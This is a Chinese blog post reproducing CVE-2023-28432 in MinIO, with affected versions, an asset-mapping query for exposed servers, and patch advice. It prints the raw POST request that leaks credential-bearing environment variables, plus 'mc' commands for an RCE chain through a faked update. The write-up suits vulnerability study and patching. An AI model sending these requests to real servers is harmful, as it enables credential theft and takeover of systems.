【漏洞复现】MinIO-verify-信息泄露漏洞(CVE-2023-28432)

最新推荐文章于 2024-06-03 14:09:36 发布
最新推荐文章于 2024-06-03 14:09:36 发布
阅读量362 收藏 3
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/136851450
版权

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

MiniO验证接口存在敏感信息泄露漏洞,攻击者可以通过构造特殊URL地址读取敏感系统信息。

影响范围

RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

资产测绘

banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”

漏洞复现

POST /minio/bootstrap/v1/verify HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image

版本号检测:

1.http请求:GET /api/v1/check-version
2.HTTP响应版本小于RELEASE.2023-03-20T20-16-18Z则存在漏洞。

信息泄漏:

POST /minio/bootstrap/v1/verify HTTP/1.1

RCE思路:

利用泄露的账号密码和MinIO客户端登录并设置MinIO的升级访问URL,因为MinIO对于升级包的sha256sum校验失效,所以能够有损的RCE。
1.设置升级url:mc alias set myminio http://ip:9000  user_R3s3arcm pwd_R3s3arcm
2.触发更新:mc admin update myminio -y

修复建议

目前厂商已发布升级补丁以修复漏洞:
https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
影响用户可以升级到安全版本:
MinIO RELEASE.2023-03-20T20-16-18Z

Nday_Seeker
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-28432 MinIO 信息泄露漏洞--漏洞复现10
nnn2188185的博客
04-08 6797
MinIO是美国MinIO公司的一款开源的对象存储服务器, 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIOMinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息泄露信息中包含登录账号密码。 CVE-2023-28432 CNNVD-202303-1795
MinIO集群模式信息泄露漏洞CVE-2023-28432
2201_75756681的博客
12-27 2942
MinIO是一个用的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)
qq_35476650的博客
03-24 6376
MinIO 是一种开源的对象存储服务,它兼容 Amazon S3 API,可以在私有云或公有云中使用。MinIO 是一种高性能、高可用性的分布式存储系统,它可以存储大量数据,并提供对数据的高速读写能力。MinIO 采用分布式架构,可以在多个节点上运行,从而实现数据的分布式存储和处理。MinIO verify接口存在敏感信息泄漏漏洞,攻击者通过构造特殊URL地址,读取系统敏感信息
Minio漏洞综合利用工具
Wulai399的博客
06-03 936
工具只在小圈子里进行分享,欢迎加入Sec探索者内部圈。内部圈服务: 常态化更新漏洞情报,开发各类Nday漏洞利用工具,提供空间测绘账号助力挖洞等等。欢迎各位师傅们进我们公开的圈子和交流群,有任何技术问题都可以在群内进行交流讨论,进群方式如下。
漏洞复现CVE-2023-28432 MinIO集群模式信息泄露漏洞
m0_53121608的博客
07-16 2649
漏洞复现CVE-2023-28432 MinIO集群模式信息泄露漏洞
漏洞复现MinIO敏感信息泄露CVE-2023-28432
刘家华(游戏开发)
04-23 1191
MinIO发现了信息泄露漏洞
MinIO信息泄漏到RCE
qq_61768489的博客
04-08 1615
验证管理员权限→获取最新版本→获取最新版本的sha256sum信息→下载并验证sha256sum→验证无误后替换自身并重启。将环境变量存储在envValues里面,其中envValues采用遍历的方式获取了skipEnvs[envK]的value。如果MinIO以集群方式部署,存在信息泄露漏洞,攻击者可以通过HTTP请求获取目标进程的所有环境变量,包括。具体利用可以参考https://github.com/AbelChe/evil_minio。这个路由的功能中,可以从远程加载二进制文件,下载并更新。
minio-RELEASE.2023-01-31T02-24-19Z版本
02-08
新版本配置 export MINIO_ROOT_USER=admin export MINIO_ROOT_PASSWORD=...原旧版本中的配置是MINIO_ACCESS_KEY和MINIO_SECRET_KEY,请注意别在各博客中直接复制把自己的配置写错了,新下载的minio是用不了旧配置滴。
bitnami-docker-minio-client:Bitnami MinIO客户端Docker映像
02-13
Bitnami打包的MinIO(R)容器客户端是什么? 该软件清单由Bitnami打包和发布。 MinIO Client是Golang CLI工具,可为文件系统和对象存储系统的ls,cp,mkdir,diff和rsync命令提供替代方案。 免责声明:所有软件产品...
minio-go:用于Go的MinIO Client SDK
02-04
用于Amazon S3兼容云存储的MinIO Go Client SDK MinIO Go Client SDK提供了简单的API,可以访问任何与Amazon S3兼容的对象存储。 本快速入门指南将向您展示如何安装MinIO客户端SDK,如何连接到MinIO以及如何为简单的...
minio-js:适用于Java的MinIO Client SDK
05-11
用于Amazon S3兼容云存储的MinIO JavaScript库 MinIO JavaScript客户端SDK提供了简单的API,可以访问任何与Amazon S3兼容的对象存储服务器。 本快速入门指南将向您展示如何安装客户端SDK并执行示例JavaScript程序。 ...
minio-boshrelease:http:bosh.io的MinIO版本
02-05
MinIO BOSH发布 允许用户以可重复的方式轻松地对软件进行版本控制,打包和部署。 此仓库提供 Object Storage Server的BOSH版本。 您可以使用此版本以独立的单节点模式以及在多个节点上的分布式模式部署MinIO。 上传...
CVE-2023-28432 MiniO信息泄露漏洞复现
Love&Share
04-28 5900
MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等在集群部署的 Minio 中,未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录 Minio,分布式部署的所有用户都会受到影响,单机用户没有影响。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
C++虚继承深度解析:优化菱形继承的策略
08-08
C++是一种通用的、面向对象的编程语言,它是由Bjarne Stroustrup在20世纪80年代初作为C语言的扩展而创建的。C++是C语言的一个超集,这意味着它包含了C语言的所有特性,并增加了面向对象编程的特性,如类和继承。C++广泛应用于系统软件、应用软件开发、游戏开发、嵌入式系统、高性能服务器和客户端应用程序等领域。 C++的一些关键特性包括: - 面向对象编程:支持类、继承、多态和封装等概念。 - 泛型编程:通过模板支持,允许编写可以处理多种数据类型的代码。 - 标准库:C++标准库提供了广泛的功能,包括输入输出、字符串操作、数学运算、数据结构等。 - 性能:C++通常提供接近于C语言的性能,因为它允许直接访问内存地址和底层硬件。 - 跨平台:C++代码可以在多种操作系统和硬件平台上编译和运行。 C++语言的标准化过程由国际标准化组织(ISO)进行,最新的标准是C++20。
基于自组织映射神经网络的鸢尾花聚类(matlab)
最新发布
08-08
基于自组织映射神经网络的鸢尾花聚类(matlab)
python1级考级重点(1).docx
08-08
本文主要介绍了Python编程语言中绘图库turtle的基本用法和相关概念,包括导入绘图库的两种方法、设置画布尺寸、画笔属性调整、绘图函数的使用等。同时,文章还简要介绍了Python的集成开发环境IDLE的特点和使用方法,以及Python编程的一些基础知识,如变量、运算符、数据类型转换、字符串操作等。核心思想是提供一个基础的入门指南,帮助初学者快速理解和掌握Python绘图的基本技能和编程基础。通过这些内容的学习,读者可以开始尝试编写简单的图形绘制脚本,为进一步深入学习Python编程打下基础。
基于51单片机设计的温度检测与高低温报警系统仿真&源码&设计文档&演示视频.zip(毕设/课设/竞赛/实训/大作业/项目开发)
08-08
【系统详解文档与演示视频链接:https://archie.blog.csdn.net/article/details/141026202?spm=1001.2014.3001.5502】系统功能简介1、实时温度测量,可调整温度值。2、显示测量的温度值,按键切换可查看高温和低温报警值。3、可通过按键输入报警最高值以及最低值,通过两个LED指示灯指示当前设置状态指示。4、当温度大于报警最高值或温度低于报警最低值时进行LED和蜂鸣器声光报警。嵌入式优质项目,资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目。 本人单片机开发经验充足,深耕嵌入式领域,有任何使用问题欢迎随时与我联系,我会及时为你解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明,项目具体内容可查看下方的资源详情。 【附带帮助】: 若还需要嵌入式物联网单片机相关领域开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步。 【本人专注嵌入式领域】: 有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为你提供帮助,CSDN博客端可私信,为你解惑,欢迎交
CVE-2023-28432
07-28
CVE-2023-28432是指MiniO验证接口敏感信息泄露漏洞。\[1\]根据引用\[2\]中的描述,该漏洞可能导致敏感信息泄露,其中包括MINIO_CERT_PASSWD等敏感信息。这意味着攻击者可能能够通过该漏洞获取到敏感信息。然而,根据引用\[3\]中的HTTP响应,我们无法确定该漏洞是否已被修复。因此,如果您正在使用MiniO,请确保及时更新到最新版本以修复该漏洞。 #### 引用[.reference_title] - *1* [Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞CVE-2023-28432)](https://blog.csdn.net/m0_46699477/article/details/129742229)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)](https://blog.csdn.net/qq_35476650/article/details/129748849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值